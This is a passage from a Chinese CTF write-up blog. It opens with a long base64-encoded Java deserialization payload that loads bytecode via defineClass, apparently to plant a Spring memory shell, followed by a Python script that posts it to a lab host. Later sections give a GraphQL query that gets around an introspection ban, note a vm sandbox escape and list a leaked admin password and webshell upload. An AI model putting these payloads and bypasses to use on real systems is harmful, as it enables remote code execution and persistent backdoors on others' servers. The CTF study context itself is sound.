k5WWkxjWGcxV2xaMlpWUkJlVmRhYldWc1NtSlFaVWQyWlRsblFtUldOSEkwYTNOTGRUSnFiMkpRZFdNeFIzbzJjRGRVVDBOb1lVMHpjUzlFZUdWRFpVWnNaa2xIYlRBeE0wbzBla3hxTTI0eU4yRnZWbGhvWlVwV2RrdFpPQzlTU1RkVmRGbGplVkowTm1kYVpVcDFhMlpXTkd4bWQxWlZXSE14T0V4UlJVWlNjVE15UkdGSFNFeDRXSFJ4YzJSaFNtRkRUaTlEZEhoVlNqTjVSVmRETVhOMk1rOXdlWEowV0c5M0wyZDFkbkZsTkM5Nk5reDJaSEp2WW1WWFRqWjZiRnB4TUM5eWRIVjRTM054UW5KWVpUQk1kWFJYTVRCekwxaFlVbVJqT1hGVlNsWmlaV2Q1YTJwRU9XdHdLM1JMYldsaWVIUXdWVmxRTkVKWE0wNXRjRmhQZFc0clRFaHlhVk5OVEM5RGNqbFlOV1oxVGpGTFNUbHJTelJwTXpKS2RHNU9jV2h5SzBveVdFSjRVRk41V214YVoxZE5NWEpIZW1OMGRIRjFTbGRqVEVwRGVtaEpaRU5DU3k5cE9XTjFRWEZOTTNCdFNUWTRZWEpuYXpCaWNscGtkM3AwYTA1WE9ITnRUMlEwTlU0MFlXTmhhMEpYVkZCTk1UTkZhbWhFSzJsVVJHZDJXRVZJWTFwTE4xcEtZVTUwVUcwNWJqSm5XVWhWYzAxeVQxVm9Oak5vVlVsbE0zQmxXbWRtZUVvMFdXc3laRFpVTm1Wc2NXSXJLMVZJWWpGd1pWbFJXV1EwWnpOclJrWlNSRTlKZFU4M1ZteEVNREJXYzNsTldEaHZkR3B4V2s1Q0wwSllOMjFKYjBKVlFYUXJVSFJzV0N0VlZYSXhRVE52ZG5KMlpHUjRNVWg2Um04cmRETklNa0pRVmpsbVJ5dE1kQzl3WWpkNWVHcDRlbFpQWmtGcWVGZFZPRlp2UW10T1prODNlV3hDUkVkbVdVRTNkV2d2WW5WVE4xVjRNVVZHTm5CclMxWkhUemhrVW14T09HTnBabUlyUWpCUVVFdFlSekpwVUZJdk5USkJOekYyVmpWR1JISjBOR1UzVFdKbFZtVnBUbFptVWtkVGJscFlNRXB6Y2paTlVIVnJXVVJrT0ZkV09HRkhkbmRxZUVScFZWSmpPRGRITW5KblFYUTRSMEU1VkdjMVFtbHNhMlpWUzB4MlpVZHlLMDg1Ykhadk9IVkZabVZQZG1Wb1NWQmxUVzgySzJka1pHSmlNa1pKYjBNNWQwYzRVRlI1ZUdwd2NUSjFjV2sxZVdkalRVdFFUWGg0VDBoeGQwOXVNalJMVmsxaFFubEZZMHBqVUc5WGJuWk5hamgyZUU1d1VIWnhiU3R5Y21KcFRUZHlZMUpzTlVOTVVFd3JUbU5IWlZwMEswdGlhbHBhVkVzclRYZDVVSFIwVlVoNk9VUTFTWE5EV2xoNmVFcHlOV040ZEdaTUswZFpXbko2Wmxac1prZEVUVFZrVVRGNFpuZFlkMnhqTkZWdU1qUlVTM1ZyYTBzdlpTczBLMmhuVWpScVRrbFpMeXRLYzIxaE1rMDNhMGROVFhZMmJrZFlhMlJEWlZSUmFtaG1OVWNyWTNsMk1WZDFWWFZOWVd0dVowaFlVelZRYnl0UmFYaG5ZVFZFTkRoM2EwSXhXVWx2WlZCTmJIUjVSME5MV0NzNGExWnRZWEZITmtSdlR6QktXbmRTTVVoMU9EZHRhazlITXpaaFZrNUdkMlk0ZGxoT1YzZHNlamwwTTNWQ1kxcGxWbVZ6Y3pZeVYyMUlMMWRUVEZkalpWVldUVkkzTlRWVk1XTnRhbWRaSzJFeU5HazRkR3d2VDBWbk16SXJXSE5VZURWcFRGSkZZbWRZWlhjclN6QlFPVXRtTkhSSmFGUnpOVkFySzAxalREa3ZSbTA1Tnk4clExVmpibGw2WTJSclNFbFdSaXRuUzJGQk1uWnlaRFpaTVU1bmF6VXphM012VldGbVpreDRia05RTURoUlVuWnVTWFJXVm1wME5GbDJRa3M1ZFVWdllTdFpXVmRxUWtGMlZFWnhSR3hNZWs5RFlWbHRRMjVQV0dsQ0wwWjViRFZIVTJWeVlreGhVVzFTS3pacVFWUjRTa2cyUlVnMmRWQklTRXRyV2tGSWRUZExla2xVYUVRdlNpOW5jRGxqWjBkbWRWcFhjVms1U1ZBelpFeFVURVZhWnk4NU9VZDJSbkJaUVhRM1JUUkxPSFp2T1dWQ1EzQjZWR3d6V25ZM1IyRmlVSGRZZFhoYWJIcDBUVTlCUVVFOUNBQVJBUUFHUEdsdWFYUStBUUFWS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsV0RBQVRBQlFLQUJBQUZRRUFBeWdwVmdFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEhBQmdNQUJNQUZ3b0FCQUFhQVFBS1oyVjBRMjl1ZEdWNGRBRUFGQ2dwVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3REFBY0FCMEtBQUlBSGdFQURtZGxkRWx1ZEdWeVkyVndkRzl5REFBZ0FCMEtBQUlBSVFFQURtRmtaRWx1ZEdWeVkyVndkRzl5QVFBbktFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME8weHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bFdEQUFqQUNRS0FBSUFKUUVBSUdwaGRtRXZiR0Z1Wnk5RGJHRnpjMDV2ZEVadmRXNWtSWGhqWlhCMGFXOXVCd0FuQVFBcmFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlNXNTJiMk5oZEdsdmJsUmhjbWRsZEVWNFkyVndkR2x2YmdjQUtRRUFIMnBoZG1FdmJHRnVaeTlPYjFOMVkyaE5aWFJvYjJSRmVHTmxjSFJwYjI0SEFDc0JBQ0JxWVhaaEwyeGhibWN2U1d4c1pXZGhiRUZqWTJWemMwVjRZMlZ3ZEdsdmJnY0FMUUVBRUdwaGRtRXZiR0Z1Wnk5VWFISmxZV1FIQUM4QkFBMWpkWEp5Wlc1MFZHaHlaV0ZrQVFBVUtDbE1hbUYyWVM5c1lXNW5MMVJvY21WaFpEc01BREVBTWdvQU1BQXpBUUFWWjJWMFEyOXVkR1Y0ZEVOc1lYTnpURzloWkdWeUFRQVpLQ2xNYW1GMllTOXNZVzVuTDBOc1lYTnpURzloWkdWeU93d0FOUUEyQ2dBd0FEY0JBRHh2Y21jdWMzQnlhVzVuWm5KaGJXVjNiM0pyTG5kbFlpNWpiMjUwWlhoMExuSmxjWFZsYzNRdVVtVnhkV1Z6ZEVOdmJuUmxlSFJJYjJ4a1pYSUlBRGtCQUJWcVlYWmhMMnhoYm1jdlEyeGhjM05NYjJGa1pYSUhBRHNCQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdEQUE5QUQ0S0FEd0FQd0VBRkdkbGRGSmxjWFZsYzNSQmRIUnlhV0oxZEdWekNBQkJBUUFNYVc1MmIydGxUV1YwYUc5a0FRQTRLRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPMHhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNNQUVNQVJBb0FBZ0JGQVFBS1oyVjBVbVZ4ZFdWemRBZ0FSd0VBQ21kbGRGTmxjM05wYjI0SUFFa0JBQkZuWlhSVFpYSjJiR1YwUTI5dWRHVjRkQWdBU3dFQVFtOXlaeTV6Y0hKcGJtZG1jbUZ0WlhkdmNtc3VkMlZpTG1OdmJuUmxlSFF1YzNWd2NHOXlkQzVYWldKQmNIQnNhV05oZEdsdmJrTnZiblJsZUhSVmRHbHNjd2dBVFFFQUdHZGxkRmRsWWtGd2NHeHBZMkYwYVc5dVEyOXVkR1Y0ZEFnQVR3RUFEMnBoZG1FdmJHRnVaeTlEYkdGemN3Y0FVUUVBSEdwaGRtRjRMbk5sY25ac1pYUXVVMlZ5ZG14bGRFTnZiblJsZUhRSUFGTUJBRjBvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3VEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3VzB4cVlYWmhMMnhoYm1jdlEyeGhjM003VzB4cVlYWmhMMnhoYm1jdlQySnFaV04wT3lsTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzTUFFTUFWUW9BQWdCV0FRQXhiM0puTG5Od2NtbHVaMlp5WVcxbGQyOXlheTVqYjI1MFpYaDBMbk4xY0hCdmNuUXVUR2wyWlVKbFlXNXpWbWxsZHdnQVdBRUFDMjVsZDBsdWMzUmhibU5sREFCYUFCMEtBRklBV3dFQUUyRndjR3hwWTJGMGFXOXVRMjl1ZEdWNGRITUlBRjBCQUFWblpYUkdWZ3dBWHdCRUNnQUNBR0FCQUJkcVlYWmhMM1YwYVd3dlRHbHVhMlZrU0dGemFGTmxkQWNBWWdFQUNHbDBaWEpoZEc5eUFRQVdLQ2xNYW1GMllTOTFkR2xzTDBsMFpYSmhkRzl5T3d3QVpBQmxDZ0JqQUdZQkFCSnFZWFpoTDNWMGFXd3ZTWFJsY21GMGIzSUhBR2dCQUFSdVpYaDBEQUJxQUIwTEFHa0Fhd0VBTlc5eVp5NXpjSEpwYm1kbWNtRnRaWGR2Y21zdWQyVmlMbU52Ym5SbGVIUXVWMlZpUVhCd2JHbGpZWFJwYjI1RGIyNTBaWGgwQ0FCdEFRQUlaMlYwUTJ4aGMzTUJBQk1vS1V4cVlYWmhMMnhoYm1jdlEyeGhjM003REFCdkFIQUtBQVFBY1FFQUVHbHpRWE56YVdkdVlXSnNaVVp5YjIwQkFCUW9UR3BoZG1FdmJHRnVaeTlEYkdGemN6c3BXZ3dBY3dCMENnQlNBSFVCQUJOcVlYWmhMMnhoYm1jdlZHaHliM2RoWW14bEJ3QjNEQUFKQUFZS0FBSUFlUXdBREFBR0NnQUNBSHNCQUF4a1pXTnZaR1ZDWVhObE5qUUJBQllvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1Z0Q0RBQjlBSDRLQUFJQWZ3RUFEbWQ2YVhCRVpXTnZiWEJ5WlhOekFRQUdLRnRDS1Z0Q0RBQ0JBSUlLQUFJQWd3RUFDMlJsWm1sdVpVTnNZWE56Q0FDRkFRQUNXMElIQUljQkFCRnFZWFpoTDJ4aGJtY3ZTVzUwWldkbGNnY0FpUUVBQkZSWlVFVUJBQkZNYW1GMllTOXNZVzVuTDBOc1lYTnpPd3dBaXdDTUNRQ0tBSTBCQUJGblpYUkVaV05zWVhKbFpFMWxkR2h2WkFFQVFDaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6dGJUR3BoZG1FdmJHRnVaeTlEYkdGemN6c3BUR3BoZG1FdmJHRnVaeTl5Wldac1pXTjBMMDFsZEdodlpEc01BSThBa0FvQVVnQ1JBUUFZYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2VFdWMGFHOWtCd0NUQVFBTmMyVjBRV05qWlhOemFXSnNaUUVBQkNoYUtWWU1BSlVBbGdvQWxBQ1hBUUFIZG1Gc2RXVlBaZ0VBRmloSktVeHFZWFpoTDJ4aGJtY3ZTVzUwWldkbGNqc01BSmtBbWdvQWlnQ2JBUUFHYVc1MmIydGxBUUE1S0V4cVlYWmhMMnhoYm1jdlQySnFaV04wTzF0TWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0RBQ2RBSjRLQUpRQW53RUFCMmRsZEVKbFlXNElBS0VCQUJ4eVpYRjFaWE4wVFdGd2NHbHVaMGhoYm1Sc1pYSk5ZWEJ3YVc1bkNBQ2pBUUFUWVdSaGNIUmxaRWx1ZEdWeVkyVndkRzl5Y3dnQXBRRUFFMnBoZG1FdmRYUnBiQzlCY25KaGVVeHBjM1FIQUtjQkFBTmhaR1FCQUJVb1RHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0tWb01BS2tBcWdvQXFBQ3JBUUFXYzNWdUxtMXBjMk11UWtGVFJUWTBSR1ZqYjJSbGNnZ0FyUUVBQjJadmNrNWhiV1VNQUs4QVBnb0FVZ0N3QVFBTVpHVmpiMlJsUW5WbVptVnlDQUN5QVFBSloyVjBUV1YwYUc5a0RBQzBBSkFLQUZJQXRRRUFFR3BoZG1FdWRYUnBiQzVDWVhObE5qUUlBTGNCQUFwblpYUkVaV052WkdWeUNBQzVBUUFHWkdWamIyUmxDQUM3QVFBZGFtRjJZUzlwYnk5Q2VYUmxRWEp5WVhsUGRYUndkWFJUZEhKbFlXMEhBTDBLQUw0QUdnRUFIR3BoZG1FdmFXOHZRbmwwWlVGeWNtRjVTVzV3ZFhSVGRISmxZVzBIQU1BQkFBVW9XMElwVmd3QUV3RENDZ0RCQU1NQkFCMXFZWFpoTDNWMGFXd3ZlbWx3TDBkYVNWQkpibkIxZEZOMGNtVmhiUWNBeFFFQUdDaE1hbUYyWVM5cGJ5OUpibkIxZEZOMGNtVmhiVHNwVmd3QUV3REhDZ0RHQU1nQkFBUnlaV0ZrQVFBRktGdENLVWtNQU1vQXl3b0F4Z0RNQVFBRmQzSnBkR1VCQUFjb1cwSkpTU2xXREFET0FNOEtBTDRBMEFFQUMzUnZRbmwwWlVGeWNtRjVBUUFFS0NsYlFnd0EwZ0RUQ2dDK0FOUUJBQVZ6WlhSR1ZnRUFPU2hNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHRNYW1GMllTOXNZVzVuTDFOMGNtbHVaenRNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwVmdFQUJHZGxkRVlCQUQ4b1RHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tVeHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOUdhV1ZzWkRzTUFOZ0EyUW9BQWdEYUFRQVhhbUYyWVM5c1lXNW5MM0psWm14bFkzUXZSbWxsYkdRSEFOd0JBQU56WlhRTUFONEFKQW9BM1FEZkNnRGRBSmNCQUFOblpYUUJBQ1lvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3S1V4cVlYWmhMMnhoYm1jdlQySnFaV04wT3d3QTRnRGpDZ0RkQU9RQkFCNXFZWFpoTDJ4aGJtY3ZUbTlUZFdOb1JtbGxiR1JGZUdObGNIUnBiMjRIQU9ZQkFCQm5aWFJFWldOc1lYSmxaRVpwWld4a0FRQXRLRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2Um1sbGJHUTdEQURvQU9rS0FGSUE2Z0VBRFdkbGRGTjFjR1Z5WTJ4aGMzTU1BT3dBY0FvQVVnRHRDZ0RuQUJVQkFCSm5aWFJFWldOc1lYSmxaRTFsZEdodlpITUJBQjBvS1Z0TWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrT3d3QThBRHhDZ0JTQVBJQkFBZG5aWFJPWVcxbERBRDBBQVlLQUpRQTlRRUFCbVZ4ZFdGc2N3d0E5d0NxQ2dBUUFQZ0JBQkZuWlhSUVlYSmhiV1YwWlhKVWVYQmxjd0VBRkNncFcweHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0RBRDZBUHNLQUpRQS9Bb0FMQUFWQVFBYWFtRjJZUzlzWVc1bkwxSjFiblJwYldWRmVHTmxjSFJwYjI0SEFQOEJBQXBuWlhSTlpYTnpZV2RsREFFQkFBWUtBQzRCQWdvQkFBQVZBUUFiVzB4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3QndFRkFRQUVRMjlrWlFFQUNrVjRZMlZ3ZEdsdmJuTUJBQTFUZEdGamEwMWhjRlJoWW14bEFDRUFBZ0FFQUFBQUFBQU9BQUVBQlFBR0FBRUJCd0FBQUE4QUFRQUJBQUFBQXhJSXNBQUFBQUFBQVFBSkFBWUFBUUVIQUFBQUR3QUJBQUVBQUFBREVndXdBQUFBQUFBQkFBd0FCZ0FDQVFjQUFBQVdBQU1BQVFBQUFBcTdBQkJaRWhLM0FCYXdBQUFBQUFFSUFBQUFCQUFCQUE0QUFRQVRBQmNBQWdFSEFBQUFJUUFEQUFNQUFBQVZLcmNBR3lxMkFCOU1LcmNBSWswcUt5eTJBQ2F4QUFBQUFBRUlBQUFBQkFBQkFCa0FBUUFjQUIwQUFnRUhBQUFBK2dBSEFBY0FBQUNRdUFBMHRnQTRUQUZOS3hJNnRnQkFFa0s0QUVaT0xSSkl1QUJHT2dRWkJCSkt1QUJHT2dVWkJSSk11QUJHT2dZckVrNjJBRUFTVUFTOUFGSlpBeXNTVkxZQVFGTUV2UUFFV1FNWkJsTzRBRmROcHdBRVRpekhBRGdyRWxtMkFFQzJBRndTWHJnQVljQUFZMDR0dGdCbnVRQnNBUUE2QkNzU2JyWUFRQmtFdGdCeXRnQjJtUUFHR1FSTnB3QUVUaXl3QUFJQUNRQlJBRlFBR1FCWkFJb0FqUUFaQUFFQkNRQUFBRWdBQmY4QVZBQURCd0FDQndBOEJ3QUVBQUVIQUJuOEFBQUhBQVQvQURRQUJRY0FBZ2NBUEFjQUJBY0FZd2NBQkFBQS93QUNBQVFIQUFJSEFEd0hBQVFIQUFRQUFRY0FHUUFCQ0FBQUFBb0FCQUFvQUNvQUxBQXVBQUlBSUFBZEFBSUJCd0FBQU1vQUJnQUhBQUFBZXJnQU5MWUFPRXdCVFNzcXRnQjZ0Z0JBdGdCY1RhY0FZMDRxdGdCOHVBQ0F1QUNFT2dRU1BCS0dCcjBBVWxrREVvaFRXUVN5QUk1VFdRV3lBSTVUdGdDU09nVVpCUVMyQUpnWkJTc0d2UUFFV1FNWkJGTlpCQU80QUp4VFdRVVpCTDY0QUp4VHRnQ2d3QUJTT2dZWkJyWUFYRTJuQUFVNkJDeXdBQUlBQ1FBVkFCZ0FHUUFaQUhNQWRnQjRBQUVCQ1FBQUFDNEFBLzhBR0FBREJ3QUNCd0E4QndBRUFBRUhBQm4vQUYwQUJBY0FBZ2NBUEFjQUJBY0FHUUFCQndCNCtnQUJBUWdBQUFBRUFBRUFHUUFCQUNNQUpBQUJBUWNBQUFCV0FBY0FCUUFBQURBckVxSUV2UUJTV1FNU0VGTUV2UUFFV1FNU3BGTzRBRmRPTFJLbXVBQmh3QUNvT2dRWkJDeTJBS3hYcHdBRVRyRUFBUUFBQUNzQUxnQVpBQUVCQ1FBQUFBd0FBbTRIQUJuOEFBQUhBQVFBQ0FCOUFINEFBZ0VIQUFBQWlnQUdBQVFBQUFCcUVxNjRBTEZNS3hLekJMMEFVbGtERWhCVHRnQzJLN1lBWEFTOUFBUlpBeXBUdGdDZ3dBQ0l3QUNJc0UwU3VMZ0FzVXdyRXJvRHZRQlN0Z0MyQVFPOUFBUzJBS0JPTGJZQWNoSzhCTDBBVWxrREVoQlR0Z0MyTFFTOUFBUlpBeXBUdGdDZ3dBQ0l3QUNJc0FBQkFBQUFLZ0FyQUJrQUFRRUpBQUFBQmdBQmF3Y0FHUUVJQUFBQUNnQUVBQ2dBTEFBcUFDNEFDUUNCQUlJQUFnRUhBQUFBYkFBRUFBWUFBQUErdXdDK1diY0F2MHk3QU1GWktyY0F4RTI3QU1aWkxMY0F5VTRSQVFDOENEb0VMUmtFdGdETldUWUZtd0FQS3hrRUF4VUZ0Z0RScC8vcks3WUExYkFBQUFBQkFRa0FBQUFjQUFML0FDRUFCUWNBaUFjQXZnY0F3UWNBeGdjQWlBQUEvQUFYQVFFSUFBQUFCQUFCQUE0QUlBRFdBTmNBQWdFSEFBQUFGd0FEQUFRQUFBQUxLeXk0QU5zckxiWUE0TEVBQUFBQUFRZ0FBQUFFQUFFQUdRQUlBRjhBUkFBQ0FRY0FBQUFkQUFJQUF3QUFBQkVxSzdnQTIwMHNCTFlBNFN3cXRnRGxzQUFBQUFBQkNBQUFBQVFBQVFBWkFBZ0EyQURaQUFJQkJ3QUFBRThBQXdBRUFBQUFLQ3EyQUhKTkxNWUFHU3dydGdEclRpMEV0Z0RoTGJCT0xMWUE3azJuLyttN0FPZFpLN2NBNzc4QUFRQUpBQlVBRmdEbkFBRUJDUUFBQUEwQUEvd0FCUWNBVWxBSEFPY0lBUWdBQUFBRUFBRUE1d0FvQUVNQVJBQUNBUWNBQUFBYUFBUUFBZ0FBQUE0cUt3TzlBRklEdlFBRXVBQlhzQUFBQUFBQkNBQUFBQWdBQXdBc0FDNEFLZ0FwQUVNQVZRQUNBUWNBQUFFakFBTUFDUUFBQU1vcXdRQlNtUUFLS3NBQVVxY0FCeXEyQUhJNkJBRTZCUmtFT2dZWkJjY0FaQmtHeGdCZkxNY0FReGtHdGdEek9nY0ROZ2dWQ0JrSHZxSUFMaGtIRlFneXRnRDJLN1lBK1prQUdSa0hGUWd5dGdEOXZwb0FEUmtIRlFneU9nV25BQW1FQ0FHbi85Q25BQXdaQmlzc3RnQ1NPZ1duLzZrNkJ4a0d0Z0R1T2dhbi81MFpCY2NBRExzQUxGa3J0d0QrdnhrRkJMWUFtQ3JCQUZLWkFCb1pCUUV0dGdDZ3NEb0h1d0VBV1JrSHRnRUR0d0VFdnhrRktpMjJBS0N3T2dlN0FRQlpHUWUyQVFPM0FRUy9BQU1BSlFCeUFIVUFMQUNjQUtNQXBBQXVBTE1BdWdDN0FDNEFBUUVKQUFBQUx3QU9Ea01IQUZMK0FBZ0hBRklIQUpRSEFGTDlBQmNIQVFZQkxBWDVBQUlJUWdjQUxBc05WQWNBTGc1SEJ3QXVBUWdBQUFBSUFBTUFMQUFxQUM0QUFBPT0nOwp2YXIgYnl0ZWNvZGU7CnRyeXsKICAgIHZhciBjbHNCYXNlNjQgPSBjbGFzc0xvYWRlci5sb2FkQ2xhc3MoJ2phdmEudXRpbC5CYXNlNjQnKTsKICAgIHZhciBjbHNEZWNvZGVyID0gY2xhc3NMb2FkZXIubG9hZENsYXNzKCdqYXZhLnV0aWwuQmFzZTY0JERlY29kZXInKTsKICAgIHZhciBkZWNvZGVyID0gY2xzQmFzZTY0LmdldE1ldGhvZCgnZ2V0RGVjb2RlcicpLmludm9rZShjbHNCYXNlNjQpOwogICAgYnl0ZWNvZGUgPSBjbHNEZWNvZGVyLmdldE1ldGhvZCgnZGVjb2RlJywgY2xzU3RyaW5nKS5pbnZva2UoZGVjb2RlciwgYnl0ZWNvZGVCYXNlNjQpOwp9IGNhdGNoIChlKSB7CiAgICB2YXIgZGF0YXR5cGVDb252ZXJ0ZXJDbHogPSBjbGFzc0xvYWRlci5sb2FkQ2xhc3MoJ2phdmF4LnhtbC5iaW5kLkRhdGF0eXBlQ29udmVydGVyJyk7CiAgICBieXRlY29kZSA9IGRhdGF0eXBlQ29udmVydGVyQ2x6LmdldE1ldGhvZCgncGFyc2VCYXNlNjRCaW5hcnknLCBjbHNTdHJpbmcpLmludm9rZShkYXRhdHlwZUNvbnZlcnRlckNseiwgYnl0ZWNvZGVCYXNlNjQpOwp9CnZhciBjbHNDbGFzc0xvYWRlciA9IGNsYXNzTG9hZGVyLmxvYWRDbGFzcygnamF2YS5sYW5nLkNsYXNzTG9hZGVyJyk7CnZhciBjbHNCeXRlQXJyYXkgPSAobmV3IGphdmEubGFuZy5TdHJpbmcoJ2EnKS5nZXRCeXRlcygpLmdldENsYXNzKCkpOwp2YXIgY2xzSW50ID0gamF2YS5sYW5nLkludGVnZXIuVFlQRTsKdmFyIGRlZmluZUNsYXNzID0gY2xzQ2xhc3NMb2FkZXIuZ2V0RGVjbGFyZWRNZXRob2QoJ2RlZmluZUNsYXNzJywgW2Nsc0J5dGVBcnJheSwgY2xzSW50LCBjbHNJbnRdKTsKZGVmaW5lQ2xhc3Muc2V0QWNjZXNzaWJsZSh0cnVlKTsKdmFyIGNsYXp6ID0gZGVmaW5lQ2xhc3MuaW52b2tlKGNsYXNzTG9hZGVyLGJ5dGVjb2RlLG5ldyBqYXZhLmxhbmcuSW50ZWdlcigwKSxuZXcgamF2YS5sYW5nLkludGVnZXIoYnl0ZWNvZGUubGVuZ3RoKSk7CmNsYXp6Lm5ld0luc3RhbmNlKCk7dAAEZXZhbHVxAH4AGwAAAAFxAH4AI3NxAH4AE3VxAH4AGAAAAABxAH4AGnVxAH4AGwAAAABzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==

send.py

import requests
import base64


with open('exp.b64', 'r') as file:
    exp_b64 = file.read()


bina = base64.b64decode(exp_b64)




# with open('exp.bin', 'rb') as file:
#     exp_data = file.read()


url = "http://10.11.253.7:23611"


r = requests.post(url, data=bina)


print(r.text)
image-20260428124430545 image-20260428124411479

QLwist

这题感觉怪怪的,到最后有四解,拼尽全力还是没能搞出来,有些遗憾。

审源码思路很清晰

通过/api/link-check 打ssrf 通过 graphql接口提权到super_admin 然后打vm 沙箱逃逸

最后一步很简单,直接用setTimeout打时序绕过拿process就行。

image-20260430090605336

但是一直卡在无法提权

首先是grapql把内省查询ban掉了,如果只是ban __schema{ 那还能%0a绕,但是他直接ban掉__schema, 没招。

其次是当时突发奇想爆jwt的secret key,没想到爆出来了

image-20260430091330941

但是用不了,因为没有看到auth.js,不能知道他jwt具体生成逻辑,所以还是没招。

最后感觉可能是通过graphql爆破结构名,虽然query没有被限制访问次数,但是在上层ssrf接口limiter根本没有skip,导致也爆破不了。

谁还有多余的招?

遗憾败北。

回来拷打了一下cc,发现其实有trick是可以绕过__schema的

可以用__type(name: “Query”)和 __type(name: “Mutation”)来替代

query {
  Q: __type(name: "Query") {
    fields {
      name
      args { name type { name kind ofType { name kind } } }
      type { name kind ofType { name kind } }
    }
  }
  M: __type(name: "Mutation") {
    fields {
      name
      args { name type { name kind ofType { name kind } } }
      type { name kind ofType { name kind } }
    }
  }
}

其他

一直在吃渗透那个app.jar,没时间看了

ISW

外网打点

这里不多赘述,dirsearch扫一下看到.dockerignore,里面有storage/data.sqlite 得到后台密码:admin / Io5gyiIw79bNC 直接传马

app.jar

神了我只能说,只要能伪造token或者绕过token校验就可以随便反序列化了,依赖给的很慷慨

但是没法伪造token或者绕过token校验(至少当时本地测了测没搞出来

死胡同了一会,另辟蹊径,发现依赖里有spring cloud且开了gateaway

试了试cve通过新建router来执行spel表达式

都不行,refresh之后都是404,本地测了能读文件,但是远程不行。

又双叒叕没招了。

碎碎念

感觉还是老了,思维不再敏捷,精力不再充沛。

My avatar

感谢阅读我的博客

More Posts
Comments